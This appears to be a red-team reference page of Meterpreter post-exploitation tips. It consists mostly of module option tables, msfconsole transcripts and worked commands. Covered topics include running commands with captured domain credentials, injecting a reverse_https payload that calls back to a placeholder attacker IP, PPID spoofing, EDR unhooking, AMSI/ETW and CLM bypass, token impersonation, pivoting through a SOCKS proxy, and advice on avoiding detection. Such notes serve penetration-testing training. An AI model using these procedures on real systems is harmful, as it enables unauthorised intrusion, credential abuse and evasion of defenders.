Backlink: reference-notes-readme


Meterpreter Tips and Tricks

Post Modules in Open Session

Use the following modules from the meterpreter prompt with: run [module] [OPT=value ...]. Options are given as OPTION=value pairs on the same line; SESSION is filled in automatically with the current session, so it never needs to be set by hand here.

Module: post/windows/manage/run_as

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CMD                        yes       Command to execute
   CMDOUT    false            yes       Retrieve command output
   DOMAIN                     yes       Domain to login with
   PASSWORD                   yes       Password to login with
   SESSION                    yes       The session to run this module on
   USER                       yes       Username to login with

Module: post/windows/manage/run_as_psh

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   ARGS                          no        Arguments
   CHANNELIZE   true             yes       Channelize output, required for reading output or interacting
   DOMAIN                        no        Domain of user
   EXE          cmd.exe          yes       Executable to run
   HIDDEN       true             yes       Hide the window
   INTERACTIVE  true             yes       Run interactively
   PASS                          yes       Password of user
   PATH         C:\              yes       Working Directory
   SESSION                       yes       The session to run this module on
   USER                          yes       User to run executable as

Module: post/windows/manage/archmigrate

Migrates the session into a process whose architecture matches the OS (an x86 meterpreter on 64-bit Windows ends up in a native x64 process). Default options should execute without issue; confirm with sysinfo afterwards.
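Worked invocations for the three modules above, added here as an example rather than taken from the original notes. The domain and account (TRICKY, sqlsvc) are the ones that appear in the incognito transcript further down this page; the password is a placeholder.

```msf
# Options go on the run line as OPT=value; SESSION is filled in with the current session.
# TRICKY / sqlsvc come from the incognito transcript on this page; <password> is a placeholder.
meterpreter > run post/windows/manage/run_as DOMAIN=TRICKY USER=sqlsvc PASSWORD=<password> CMD=whoami CMDOUT=true

# Same credentials through the PowerShell-based variant. With the defaults (EXE=cmd.exe,
# INTERACTIVE=true, CHANNELIZE=true) this drops into an interactive cmd.exe running as sqlsvc.
# Note the option is PASS here, not PASSWORD.
meterpreter > run post/windows/manage/run_as_psh DOMAIN=TRICKY USER=sqlsvc PASS=<password>

# Fix the architecture first if sysinfo shows an x86 Meterpreter on x64 Windows;
# defaults are fine, then confirm the change.
meterpreter > sysinfo
meterpreter > run post/windows/manage/archmigrate
meterpreter > sysinfo
```

With CMDOUT=false (the run_as default) the command is only launched and nothing comes back; set CMDOUT=true whenever the result matters.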


Module: exploit/windows/local/payload_inject

This one is a local exploit module rather than a post module, which is why it shows payload options and an exploit target below. The usual way to drive it is from msfconsole (use ..., set SESSION), and it starts its own handler for the payload it injects.

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   AUTOUNHOOK   false            no        Auto remove EDRs hooks
   PID          0                no        Process Identifier to inject of process to inject payload. 0=New Process
   PPID         0                no        Process Identifier for PPID spoofing when creating a new process. (0 = no PPID spoofing)
   SESSION                       yes       The session to run this module on
   WAIT_UNHOOK  5                yes       Seconds to wait for unhook to be executed


Payload options (windows/x64/meterpreter/reverse_https):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     0.0.0.0          yes       The local listener hostname
   LPORT     443              yes       The local listener port
   LURI                       no        The HTTP Path


Exploit target:

   Id  Name
   --  ----
   0   Windows
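Driving payload_inject from msfconsole against the backgrounded session, as an added example that is not part of the original notes. 10.10.14.5 and PID 1234 are placeholders. LHOST has to be an address the target can reach: the 0.0.0.0 shown in the table above is only the handler's bind default, and a stager built with it would try to call back to 0.0.0.0.

```msf
# Local exploit module: set it up from msfconsole against the existing session.
msf6 > use exploit/windows/local/payload_inject
msf6 exploit(windows/local/payload_inject) > set SESSION 2
msf6 exploit(windows/local/payload_inject) > set PAYLOAD windows/x64/meterpreter/reverse_https

# LHOST is the callback address baked into the stager (10.10.14.5 is a placeholder attacker IP).
msf6 exploit(windows/local/payload_inject) > set LHOST 10.10.14.5
msf6 exploit(windows/local/payload_inject) > set LPORT 443

# PID=0 spawns a fresh process. PPID=<pid of a plausible parent such as explorer.exe, found
# with "ps" in the session; 1234 is a placeholder> makes the new process a child of that
# parent instead of of the process hosting Meterpreter.
msf6 exploit(windows/local/payload_inject) > set PID 0
msf6 exploit(windows/local/payload_inject) > set PPID 1234

# AUTOUNHOOK attempts to remove userland EDR hooks before injecting; WAIT_UNHOOK is how
# long (seconds) to give that step.
msf6 exploit(windows/local/payload_inject) > set AUTOUNHOOK true
msf6 exploit(windows/local/payload_inject) > set WAIT_UNHOOK 5
msf6 exploit(windows/local/payload_inject) > run

# A new session should arrive on the handler the module started for you.
msf6 exploit(windows/local/payload_inject) > sessions -l
```

Injecting into an existing PID instead (PID=<pid>) skips process creation, so PPID is ignored in that case.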

Module: post/windows/gather/credentials/enum_laps


Module: powershell

load powershell

Use the above command to load the powershell extension. It hosts a PowerShell runspace inside the Meterpreter process rather than starting powershell.exe.

powershell_shell

Use the above command to open an interactive PowerShell shell, which will have bypassed CLM restrictions. Check it from inside the shell with $ExecutionContext.SessionState.LanguageMode, which should report FullLanguage if the bypass holds. The extension also provides powershell_execute for one-off commands and powershell_import for loading a .ps1 into the runspace.


Module: multi/manage/autoroute

c:\Users\will>^Z
Background channel 1? [y/N]  y
meterpreter > bg
[*] Backgrounding session 2...

msf6 exploit(multi/handler) > use multi/manage/autoroute
[*] Using configured payload windows/x64/meterpreter/reverse_https

msf6 post(multi/manage/autoroute) > set session 2
session => 2

msf6 post(multi/manage/autoroute) > exploit

[!] SESSION may not be compatible with this module:
[!]  * incompatible session platform: windows
[*] Running module against CLIENT09
[*] Searching for subnets to autoroute.
[+] Route added to subnet 172.16.76.0/255.255.255.0 from host's routing table.
[*] Post module execution completed

msf6 post(multi/manage/autoroute) > use auxiliary/server/socks_proxy 
[*] Using configured payload windows/x64/meterpreter/reverse_https

msf6 auxiliary(server/socks_proxy) > set srvhost 127.0.0.1
srvhost => 127.0.0.1

msf6 auxiliary(server/socks_proxy) > run -j
[*] Auxiliary module running as background job 0.
[*] Starting the SOCKS proxy server

Reference the commands above to set up a SOCKS proxy through a meterpreter session. The "SESSION may not be compatible" warning is only a platform-compatibility notice from the multi-platform module; the route was still added, as the next line shows. Confirm with route print in msfconsole. socks_proxy listens as SOCKS5 on SRVPORT 1080 by default, so proxychains needs a socks5 127.0.0.1 1080 entry. Only TCP is relayed through the pivot, so ICMP (ping) through it will not work.
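Follow-up to the transcript above, added here as an example and not part of the original notes: verifying the route, reaching the subnet from msfconsole modules directly, pinning the SOCKS listener settings, and tearing it all down. The session number and subnet reuse the transcript's values; SRVPORT 1080 and VERSION 5 are the socks_proxy defaults, and 172.16.76.10 in the usage note is a placeholder host.

```msf
# Check the route autoroute added for session 2, or add one by hand if it missed a subnet.
msf6 > route print
msf6 > route add 172.16.76.0/24 2

# Modules run inside msfconsole use the route directly; no proxy is involved.
msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > set RHOSTS 172.16.76.0/24
msf6 auxiliary(scanner/portscan/tcp) > set PORTS 445,3389
msf6 auxiliary(scanner/portscan/tcp) > run

# External tools need the SOCKS server. Defaults are SOCKS5 on 1080; set them explicitly
# so the proxychains entry matches what is actually listening.
msf6 > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set SRVHOST 127.0.0.1
msf6 auxiliary(server/socks_proxy) > set SRVPORT 1080
msf6 auxiliary(server/socks_proxy) > set VERSION 5
msf6 auxiliary(server/socks_proxy) > run -j
msf6 auxiliary(server/socks_proxy) > jobs

# Tear down when done (job 0 is the proxy from the transcript above).
msf6 > jobs -k 0
msf6 > route flush
```

On the attacker host, with socks5 127.0.0.1 1080 as the proxy line in /etc/proxychains4.conf, TCP tools go through the pivot, e.g. proxychains4 nmap -sT -Pn -p 445 172.16.76.10 (connect scan and -Pn, since SYN scans and ICMP cannot traverse SOCKS).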


Module: incognito

meterpreter > use incognito

Incognito Commands
==================

    Command              Description
    -------              -----------
    add_group_user       Attempt to add a user to a global group with all tokens
    add_localgroup_user  Attempt to add a user to a local group with all tokens
    add_user             Attempt to add a user with all tokens
    impersonate_token    Impersonate specified token
    list_tokens          List tokens available under current user context
    snarf_hashes         Snarf challenge/response hashes for every token

meterpreter > list_tokens -u

Delegation Tokens Available
========================================
Font Driver Host\UMFD-0
Font Driver Host\UMFD-1
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
NT SERVICE\SQLTELEMETRY$SQLEXPRESS
SQL05\setup
TRICKY\sqlsvc
Window Manager\DWM-1

Impersonation Tokens Available
========================================
No tokens available


meterpreter > impersonate_token TRICKY\\sqlsvc
[+] Delegation token available
[+] Successfully impersonated user TRICKY\sqlsvc

meterpreter > getuid
Server username: TRICKY\sqlsvc
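The same token flow with the checks around it, added here as an example rather than taken from the original notes. Impersonating other users' tokens needs SeImpersonatePrivilege in the current process, which is why the session is taken to SYSTEM first; the account is the one from the transcript above, and PID 1234 is a placeholder.

```msf
# Token impersonation needs SeImpersonatePrivilege; check, and escalate first if it is missing.
meterpreter > getprivs
meterpreter > getsystem

# "use" still works but is a deprecated alias for "load".
meterpreter > load incognito

# -u lists tokens by user. Delegation tokens can authenticate to other hosts as that user;
# impersonation tokens only work locally.
meterpreter > list_tokens -u

# The backslash must be doubled on the Meterpreter prompt.
meterpreter > impersonate_token TRICKY\\sqlsvc
meterpreter > getuid

# Drop the impersonated token and return to the session's original identity.
meterpreter > rev2self
meterpreter > getuid

# Alternative without incognito: take the primary token of a process already running as
# the target user (find the PID with ps; 1234 is a placeholder), then release it.
meterpreter > steal_token 1234
meterpreter > getuid
meterpreter > drop_token
```

After impersonate_token, a new session spawned from this one inherits the impersonated identity only if it is created with thread impersonation (see USETHROKEN-style options such as USETHREADTOKEN below); processes started without it run as the original primary token.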



Module: post/windows/manage/execute_dotnet_assembly

Module options (post/windows/manage/execute_dotnet_assembly):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   AMSIBYPASS      true             yes       Enable Amsi bypass
   ARGUMENTS                        no        Command line arguments
   DOTNET_EXE                       yes       Assembly file name
   ETWBYPASS       true             yes       Enable Etw bypass
   PID             0                no        Pid  to inject
   PPID            0                no        Process Identifier for PPID spoofing when creating a new process. (0 = no PPID spoofing)
   PROCESS         notepad.exe      no        Process to spawn
   SESSION                          yes       The session to run this module on
   Signature       Automatic        yes       The Main function signature (Accepted: Automatic, Main(), Main(string[]))
   USETHREADTOKEN  true             no        Spawn process with thread impersonation
   WAIT            10               no        Time in seconds to wait
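Invocations of execute_dotnet_assembly as an added example, not from the original notes. /opt/tools/Seatbelt.exe is a placeholder path on the attacker's machine standing in for any .NET assembly with a Main entry point, and PID 4321 is a placeholder.

```msf
# DOTNET_EXE is read on the attacker side and sent over the session; it never touches disk
# on the target. With PID=0 the module spawns PROCESS (notepad.exe by default) and injects there.
meterpreter > run post/windows/manage/execute_dotnet_assembly DOTNET_EXE=/opt/tools/Seatbelt.exe ARGUMENTS=-group=user PROCESS=notepad.exe

# Inject into an existing process instead of spawning one (PID placeholder, pick one with ps),
# and give a slow assembly more time to finish before output is collected.
meterpreter > run post/windows/manage/execute_dotnet_assembly DOTNET_EXE=/opt/tools/Seatbelt.exe ARGUMENTS=-group=user PID=4321 WAIT=30

# If Automatic does not find the entry point, pin the signature explicitly.
meterpreter > run post/windows/manage/execute_dotnet_assembly DOTNET_EXE=/opt/tools/Seatbelt.exe ARGUMENTS=-group=user Signature=Main(string[])
```

A spawned notepad.exe with no window is an easy thing for defenders to spot; prefer injecting into an existing PID or setting PROCESS to something that belongs on the host. AMSIBYPASS and ETWBYPASS default to true and patch the hosting process before the assembly loads.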

That's it.